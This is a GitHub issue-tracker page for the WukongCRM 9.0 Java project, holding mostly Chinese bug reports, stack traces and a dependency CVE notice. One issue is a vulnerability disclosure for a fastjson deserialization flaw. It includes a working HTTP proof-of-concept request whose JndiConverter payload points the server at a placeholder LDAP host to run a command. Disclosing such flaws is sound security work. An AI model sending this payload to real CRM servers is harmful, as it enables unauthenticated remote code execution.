wukongopensource / wukongcrm-9.0-java Goto Github PK

View Code? Open in Web Editor NEW

682.0 682.0 335.0 21.04 MB

悟空CRM-基于jfinal+vue+ElementUI的前后端分离CRM系统

Home Page: http://www.5kcrm.com

License: Other

Batchfile 0.03% Shell 0.03% Java 90.04% HTML 0.41% JavaScript 6.24% CSS 0.76% Dockerfile 0.01% SCSS 2.48%

wukongcrm-9.0-java's People

Contributors

Stargazers

Watchers

Forkers

wukongcrm kcly3027 jnuff-u chenchenchenchenyang leeyu35 gx0803 skiplai diffblue-benchmarks hjl12 dyb10101 liuyexiang1995 wushange funnyliu dawn1iu xchloading xjyuan wanghui2019 ichoukou cqhaohao viraj99 jeffreymo wuguanling99 duyuxuan henry0249 tangchencreator harukizzp vacuole1989 xjzhou hctwgl dzl84394 xxrl liuyongt ukhack vicsw liaobude incoger nanxiangqingfeng weijuntao edhugo88 luchenx baininghan limedroid isnosky yituzaitu fear-wall hczydev yinrongping robinluog dut3062796s milesking wanghaoyuissun liunim luceas xueyunliu charleskun chenshouw guyichuang aenan sddisaprogrammer cosisoft blocky2019 rowsen001 waffcloud txzcaoyu xydoublez zhonglh damingqicai xxh332211 cnxxyy bluebang fuhmdyd pendyliu qiuqqit 872409 block2 lehuai zhangton8 miazzy willneverknowme shukaizhe zouchengfang baitcenter brandonbaba smallcrazycrazy vincent5chen andyyangzj onenewworld cyken8 woosa-lk antpress qinshouzhi nothinglz hb00 hotsmile wukongtime jiayanju cpa519904 wenlaizhou einstein-github jesley-sun

wukongcrm-9.0-java's Issues

工作台的数据隔离有问题

首页工作台的数据隔离有问题，添加了日程后，后台数据设为只有本人能看，但同部门的人都能看到，不同部门的人看不到，应该只有自已可看，日程菜单进去后是对的，但工作台会有相同部门其他人的记录

Remote command execution vulnerability

In version 72crm_9.0.1_20191202, insecure components are used, which causes potential remote command execution. Attackers can directly attack the system without authorization.
An insecure version of the fastjson component was used

First we found a vulnerability trigger :
http://localhost:8080/CrmCustomer/queryPageList
The construction method of BasePageRequest is called for processing. In the process of processing, the parseObject() method of fastjson is first called to parse the json string into a java bean. Due to the deserialization vulnerability of this version of fastjson, Attackers just visit: / CrmCustomer/queryPageList, and enter the malicious json string, can trigger a loophole

There are many attack modes in version 1.2.54, and only one of them is shown below:
This attack requires the xbean jar package to be introduced and AutoType to be enabled

Start the attack

POC :
POST /CrmCustomer/queryPageList HTTP/1.1
Host: localhost:8080
Content-Length: 115
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}"

导入5000条数据查询超时

导入5000条数据查询超时
php版没这个问题

前端代码从哪下？

没有人注意到初始经数据库时的导入数据库脚本是有问题的吗？

员工新增后完善其他非必填信息保存报错

你好，我朋友的公司想用这个做内部管理系统，是否需要取得授权呢

对于涉及到的法律问题不太清楚，麻烦解答

无法部署

合同编码限制为数字，这个可以改成字母/-/数字吗？

如果要自己改只需要改前端吗？

官方不再维护了

研究了一个多星期，悟空crm适合拿来直接用，不适合深度定制，代码和sql可读性太差了，很多版本太老旧，官方也不继续维护，跟JeecgBoot和ruoyi-vue-pro没法比。软件没有了维护就意味着生命周期终止。
https://github.com/jeecgboot/jeecg-boot
https://github.com/YunaiV/ruoyi-vue-pro

前端代码从哪下？

高级删选下拉列表无值

客户列表获取报错

Caused by: com.mysql.jdbc.MysqlDataTruncation: Data truncation: BIGINT UNSIGNED value is out of range in '((to_days(`crm9`.`a`.`update_time`) + cast((select `crm9`.`72crm_admin_config`.`value` from `crm9`.`72crm_admin_config` where (`crm9`.`72crm_admin_config`.`name` = 'customerPoolSettingFollowupDays')) as unsigned)) - to_days(now()))'
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3971)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3909)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:873)
        at com.mysql.jdbc.MysqlIO.nextRow(MysqlIO.java:1996)
        at com.mysql.jdbc.MysqlIO.readSingleRowSet(MysqlIO.java:3410)
        at com.mysql.jdbc.MysqlIO.getResultSet(MysqlIO.java:470)
        at com.mysql.jdbc.MysqlIO.readResultsForQueryOrUpdate(MysqlIO.java:3112)
        at com.mysql.jdbc.MysqlIO.readAllResults(MysqlIO.java:2341)
        at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2736)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2487)
        at com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:1858)
        at com.mysql.jdbc.PreparedStatement.executeQuery(PreparedStatement.java:1966)
        at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2714)
        at com.alibaba.druid.wall.WallFilter.preparedStatement_executeQuery(WallFilter.java:622)
        at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2711)
        at com.alibaba.druid.filter.FilterEventAdapter.preparedStatement_executeQuery(FilterEventAdapter.java:465)
        at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2711)
        at com.alibaba.druid.proxy.jdbc.PreparedStatementProxyImpl.executeQuery(PreparedStatementProxyImpl.java:145)
        at com.alibaba.druid.pool.DruidPooledPreparedStatement.executeQuery(DruidPooledPreparedStatement.java:227)
        at com.jfinal.plugin.activerecord.DbPro.find(DbPro.java:314)
        at com.jfinal.plugin.activerecord.DbPro.doPaginateByFullSql(DbPro.java:578)
        at com.jfinal.plugin.activerecord.DbPro.doPaginate(DbPro.java:535)

Dependency org.apache.poi:poi-ooxml, leading to CVE problem

Hi, In 72crm-9.0-JAVA，there is a dependency org.apache.poi:poi-ooxml:3.17 that calls the risk method.

CVE-2019-12415

The scope of this CVE affected version is [,4.1.0)

After further analysis, in this project, the main Api called is <org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String getStringCellValue()>

Risk method repair link : GitHub

CVE Bug Invocation Path--

Path Length : 4

org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String getStringCellValue()>
at <org.apache.poi.xssf.streaming.SXSSFCell: org.apache.poi.ss.usermodel.RichTextString getRichStringCellValue()> (org.apache.poi.xssf.streaming.SXSSFCell.java:[453]) in /.m2/repository/org/apache/poi/poi-ooxml/3.17/poi-ooxml-3.17.jar
at <org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String toString()> (org.apache.poi.xssf.streaming.SXSSFCell.java:[768]) in /.m2/repository/org/apache/poi/poi-ooxml/3.17/poi-ooxml-3.17.jar
at <com.kakarote.crm9.erp.crm.service.CrmLeadsService: com.kakarote.crm9.utils.R uploadExcel(com.jfinal.upload.UploadFile,java.lang.Integer,java.lang.Integer)> (com.kakarote.crm9.erp.crm.service.CrmLeadsService.java:[393]) in /detect/unzip/72crm-9.0-JAVA-9.0.1_20191202/target/classes

Dependency tree--

[INFO] com.kakarote:crm9:jar:1.3.3
[INFO] +- com.jfinal:jfinal-undertow:jar:1.9:compile
[INFO] |  +- io.undertow:undertow-core:jar:2.0.25.Final:compile
[INFO] |  |  +- org.jboss.logging:jboss-logging:jar:3.4.0.Final:compile
[INFO] |  |  +- org.jboss.xnio:xnio-api:jar:3.3.8.Final:compile
[INFO] |  |  \- org.jboss.xnio:xnio-nio:jar:3.3.8.Final:runtime
[INFO] |  +- io.undertow:undertow-servlet:jar:2.0.25.Final:compile
[INFO] |  \- javax.servlet:javax.servlet-api:jar:4.0.1:compile
[INFO] +- com.jfinal:jfinal:jar:3.8:compile
[INFO] +- cglib:cglib-nodep:jar:3.2.5:compile
[INFO] +- com.jfinal:cos:jar:2019.8:compile
[INFO] +- it.sauronsoftware.cron4j:cron4j:jar:2.2.5:compile
[INFO] +- redis.clients:jedis:jar:2.9.0:compile
[INFO] |  \- org.apache.commons:commons-pool2:jar:2.4.2:compile
[INFO] +- de.ruedigermoeller:fst:jar:2.50:compile
[INFO] |  +- com.fasterxml.jackson.core:jackson-core:jar:2.8.8:compile
[INFO] |  +- org.javassist:javassist:jar:3.21.0-GA:compile
[INFO] |  +- org.objenesis:objenesis:jar:2.5.1:compile
[INFO] |  \- com.cedarsoftware:java-util:jar:1.9.0:compile
[INFO] |     +- commons-logging:commons-logging:jar:1.1.1:compile
[INFO] |     \- com.cedarsoftware:json-io:jar:2.5.1:compile
[INFO] +- org.slf4j:slf4j-nop:jar:1.7.25:compile
[INFO] |  \- org.slf4j:slf4j-api:jar:1.7.25:compile
[INFO] +- log4j:log4j:jar:1.2.16:compile
[INFO] +- mysql:mysql-connector-java:jar:5.1.44:compile
[INFO] +- com.alibaba:druid:jar:1.0.29:compile
[INFO] |  +- com.alibaba:jconsole:jar:1.8.0:system
[INFO] |  \- com.alibaba:tools:jar:1.8.0:system
[INFO] +- com.alibaba:fastjson:jar:1.2.54:compile
[INFO] +- cn.hutool:hutool-all:jar:4.4.0:compile
[INFO] +- org.apache.poi:poi-ooxml:jar:3.17:compile
[INFO] |  +- org.apache.poi:poi:jar:3.17:compile
[INFO] |  |  +- commons-codec:commons-codec:jar:1.10:compile
[INFO] |  |  \- org.apache.commons:commons-collections4:jar:4.1:compile
[INFO] |  +- org.apache.poi:poi-ooxml-schemas:jar:3.17:compile
[INFO] |  |  \- org.apache.xmlbeans:xmlbeans:jar:2.6.0:compile
[INFO] |  |     \- stax:stax-api:jar:1.0.1:compile
[INFO] |  \- com.github.virtuald:curvesapi:jar:1.04:compile
[INFO] +- com.aliyun:aliyun-java-sdk-core:jar:4.0.6:compile
[INFO] |  +- com.google.code.gson:gson:jar:2.8.2:compile
[INFO] |  +- org.apache.httpcomponents:httpclient:jar:4.5.3:compile
[INFO] |  |  \- org.apache.httpcomponents:httpcore:jar:4.4.6:compile
[INFO] |  +- javax.xml.bind:jaxb-api:jar:2.1:compile
[INFO] |  |  \- javax.xml.stream:stax-api:jar:1.0-2:compile
[INFO] |  +- com.sun.xml.bind:jaxb-core:jar:2.1.14:compile
[INFO] |  +- com.sun.xml.bind:jaxb-impl:jar:2.1:compile
[INFO] |  \- javax.activation:activation:jar:1.1.1:compile
[INFO] +- com.aliyun:aliyun-java-sdk-dysmsapi:jar:1.1.0:compile
[INFO] \- com.github.ben-manes.caffeine:caffeine:jar:2.6.2:compile

Suggested solutions:

Update dependency version

Thank you very much.

http://10.195.182.29:8080/api/login
请求方法:POST
远程地址:10.195.182.29:8080
状态码:404
版本:HTTP/1.1

是我哪里没有配置对？？？？？？？？？？？？？？？

商业智能数据权限

版本 V9.2.3.191220
后台设置客户管理角色数据权限为本人但是商业智能模版所有数据都是对应部门的所有人的统计分析

线索-删除的时候报错

2019-07-22 13:21:33,245 [ERROR][XNIO-1 task-111][ErpInterceptor.java:49] 响应错误
com.jfinal.plugin.activerecord.ActiveRecordException: java.lang.IllegalArgumentException: The element in list must be Model or Record.
        at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:1050)
        at com.jfinal.plugin.activerecord.Db.batch(Db.java:617)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService.lambda$deleteByIds$0(CrmLeadsService.java:155)
        at com.jfinal.plugin.activerecord.DbPro.tx(DbPro.java:770)
        at com.jfinal.plugin.activerecord.DbPro.tx(DbPro.java:807)
        at com.jfinal.plugin.activerecord.Db.tx(Db.java:545)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService.deleteByIds(CrmLeadsService.java:153)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c.CGLIB$deleteByIds$7(<generated>)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c$$FastClassByCGLIB$$58167888.invoke(<generated>)
        at net.sf.cglib.proxy.MethodProxy.invokeSuper(MethodProxy.java:228)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:81)
        at com.jfinal.aop.Callback.intercept(Callback.java:68)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c.deleteByIds(<generated>)
        at com.kakarote.crm9.erp.crm.controller.CrmLeadsController.deleteByIds(CrmLeadsController.java:100)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:74)
        at com.kakarote.crm9.erp.crm.common.CrmInterceptor.intercept(CrmInterceptor.java:84)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
        at com.kakarote.crm9.common.interceptor.AuthInterceptor.intercept(AuthInterceptor.java:39)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
        at com.kakarote.crm9.common.interceptor.ErpInterceptor.intercept(ErpInterceptor.java:46)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
        at com.jfinal.core.ActionHandler.handle(ActionHandler.java:89)
        at com.jfinal.plugin.druid.DruidStatViewHandler.handle(DruidStatViewHandler.java:81)
        at com.jfinal.core.JFinalFilter.doFilter(JFinalFilter.java:89)
        at io.undertow.servlet.core.ManagedFilter.doFilter(ManagedFilter.java:61)
        at io.undertow.servlet.handlers.FilterHandler$FilterChainImpl.doFilter(FilterHandler.java:131)
        at io.undertow.servlet.handlers.FilterHandler.handleRequest(FilterHandler.java:84)
        at io.undertow.servlet.handlers.security.ServletSecurityRoleHandler.handleRequest(ServletSecurityRoleHandler.java:62)
        at io.undertow.servlet.handlers.ServletChain$1.handleRequest(ServletChain.java:68)
        at io.undertow.servlet.handlers.ServletDispatchingHandler.handleRequest(ServletDispatchingHandler.java:36)
        at io.undertow.servlet.handlers.security.SSLInformationAssociationHandler.handleRequest(SSLInformationAssociationHandler.java:132)
        at io.undertow.servlet.handlers.security.ServletAuthenticationCallHandler.handleRequest(ServletAuthenticationCallHandler.java:57)
        at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
        at io.undertow.security.handlers.AbstractConfidentialityHandler.handleRequest(AbstractConfidentialityHandler.java:46)
        at io.undertow.servlet.handlers.security.ServletConfidentialityConstraintHandler.handleRequest(ServletConfidentialityConstraintHandler.java:64)
        at io.undertow.security.handlers.AuthenticationMechanismsHandler.handleRequest(AuthenticationMechanismsHandler.java:60)
        at io.undertow.servlet.handlers.security.CachedAuthenticatedSessionHandler.handleRequest(CachedAuthenticatedSessionHandler.java:77)
        at io.undertow.security.handlers.AbstractSecurityContextAssociationHandler.handleRequest(AbstractSecurityContextAssociationHandler.java:43)
        at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
        at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
        at io.undertow.servlet.handlers.ServletInitialHandler.handleFirstRequest(ServletInitialHandler.java:292)
        at io.undertow.servlet.handlers.ServletInitialHandler.access$100(ServletInitialHandler.java:81)
        at io.undertow.servlet.handlers.ServletInitialHandler$2.call(ServletInitialHandler.java:138)
        at io.undertow.servlet.handlers.ServletInitialHandler$2.call(ServletInitialHandler.java:135)
        at io.undertow.servlet.core.ServletRequestContextThreadSetupAction$1.call(ServletRequestContextThreadSetupAction.java:48)
        at io.undertow.servlet.core.ContextClassLoaderSetupAction$1.call(ContextClassLoaderSetupAction.java:43)
        at io.undertow.servlet.handlers.ServletInitialHandler.dispatchRequest(ServletInitialHandler.java:272)
        at io.undertow.servlet.handlers.ServletInitialHandler.access$000(ServletInitialHandler.java:81)
        at io.undertow.servlet.handlers.ServletInitialHandler$1.handleRequest(ServletInitialHandler.java:104)
        at io.undertow.server.Connectors.executeRootHandler(Connectors.java:364)
        at io.undertow.server.HttpServerExchange$1.run(HttpServerExchange.java:830)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
        at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.IllegalArgumentException: The element in list must be Model or Record.
        at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:973)
        at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:1048)
        ... 57 more